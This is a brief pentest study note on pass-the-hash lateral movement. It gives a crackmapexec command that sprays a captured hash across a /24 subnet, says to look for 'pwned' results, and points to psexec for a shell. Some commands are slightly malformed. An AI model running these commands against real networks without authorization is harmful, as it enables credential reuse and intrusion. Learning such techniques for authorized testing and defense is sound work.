Pass the Hash / Pass the Password
When we have the hash or password, we can take those and pass them around the network and potentially log in to other applications or servers
A tool that can be used for this is called crackmapexec
This takes the username, domain, and password and throws it all around the subnet and see where it sticks
Installing crackmapexec
apt-install crackmapexec
Using crackmapexec to pass the hash
crackmapexec smb IP ADDRESS/24 -u “User Name”-H HASH –local-auth
This will attempt to access all around the network to gain access
We are looking for anything that is Green or says pwned
BONUS
To get a shell out of this you can use psexec
psexec –help
